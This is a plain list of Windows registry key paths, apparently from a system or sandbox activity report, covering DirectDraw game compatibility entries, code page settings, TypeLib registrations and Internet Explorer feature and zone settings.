  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Rogue Squadron\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Rogue Squadron\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Savage
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Savage\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Savage\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Savage\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ScorchedPlanet
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ScorchedPlanet\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ScorchedPlanet\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ScorchedPlanet\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\SilentThunder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\SilentThunder\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\SilentThunder\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\SilentThunder\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft100
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft100\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft100\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft100\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft115
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft115\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft115\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraft115\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraftDemo
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraftDemo\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraftDemo\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\StarCraftDemo\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Terracide
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Terracide\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Terracide\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Terracide\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ThirdDimension
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ThirdDimension\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ThirdDimension\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ThirdDimension\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisQualityBenchmark\ID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark\Flags
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\ZiffDavisWinMarkBenchmark\ID
  • HKEY_LOCAL_MACHINE\Software\Microsoft\DirectDraw\GammaCalibrator
  • HKEY_LOCAL_MACHINE\Software\Microsoft\DirectDraw\MostRecentApplication
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication\Name
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication\ID
  • HKEY_LOCAL_MACHINE\Software\Microsoft\DirectDraw
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ModeXOnly
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\EmulationOnly
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ShowFrameRate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\EnablePrintScreen
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ForceAGPSupport
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableAGPSupport
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableMMX
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableDDSCAPSInDDSD
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\DisableWiderSurfaces
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\UseNonLocalVidMem
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\ForceRefreshRate
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Direct3D\FlipNoVsync
  • HKEY_CLASSES_ROOT\MIME\Database\Content Type\image/png
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/png\Extension
  • HKEY_CLASSES_ROOT\MIME\Database\Content Type\image/gif
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/gif\Extension
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\OWNDC
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\DxTrans
  • HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\DxTrans
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\DxTrans
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{E71B4063-3E59-11D2-952A-00C04FA34F05}
  • HKEY_CURRENT_USER\Software\Classes\TypeLib
  • HKEY_CURRENT_USER\Software\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}\1.1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}\1.1\804
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}\1.1\4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}\1.1\0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}\1.1\0\win32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{5E77EB03-937C-11D1-B047-00AA003B6061}\1.1\0\win32\(Default)
  • HKEY_CURRENT_USER\Software\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}\1.1
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}\1.1\804
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}\1.1\4
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}\1.1\0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}\1.1\0\win32
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{54314D1D-35FE-11D1-81A1-0000F87557DB}\1.1\0\win32\(Default)
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_BEHAVIORS_DRAW_REENTRANCY
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Codepage
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1250
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1251
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1253
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1254
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1255
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1256
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1257
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1258
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\874
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1361
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFontSize
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFontSizePrivate
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEPropFontName
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\26\IEFixedFontName
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\864
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\708
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51256
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\720
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28596
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10004
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\775
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28594
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\852
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28592
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10029
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\54936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\52936
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50227
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10008
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50950
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20000
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20002
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50229
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10002
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10082
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51251
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\866
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28595
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20866
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\21866
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10007
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28603
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\29001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\21027
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\863
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20106
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51253
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\737
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28597
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10006
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\869
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\862
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\38598
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28598
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10005
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20003
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20420
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20880
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\21025
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20277
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1142
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20278
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1143
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20297
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1147
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20273
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1141
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20423
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\875
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20424
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20871
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1149
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\500
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1148
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20280
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1144
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50930
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50939
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50931
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20290
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50933
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20833
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\870
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50935
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20284
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1145
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20838
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50937
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20905
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1026
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20285
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1146
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\37
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1140
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1047
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20924
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\861
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10079
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57006
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57003
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57002
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57010
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57008
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57009
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57007
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57011
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57004
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\57005
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20269
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50220
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20932
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50221
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50222
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\51949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\50225
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10003
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20949
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28593
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28605
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\865
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20108
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\855
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\437
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\858
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\860
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10010
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20107
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20261
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20001
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20004
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10021
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\857
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28599
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10081
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10017
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\1201
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20005
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\850
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\20105
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\28591
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\10000
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Friendly http errors
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_Isolate_Named_Windows
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_Isolate_Named_Windows
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2700
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_RES_TO_LMZ\*
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOAD_SHDOCLC_RESOURCES
  • HKEY_CLASSES_ROOT\.htm
  • HKEY_CURRENT_USER\Software\Classes\.htm\Content Type
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\160A
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHIM_MSHELP_COMBINE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHIM_MSHELP_COMBINE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHIM_MSHELP_COMBINE\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHIM_MSHELP_COMBINE\*
  • HKEY_CLASSES_ROOT\.css
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.css\Content Type
  • HKEY_CURRENT_USER\SOFTWARE\Classes\PROTOCOLS\Filter\text/css
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/css
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_CUSTOM_IMAGE_MIME_TYPES_KB910561
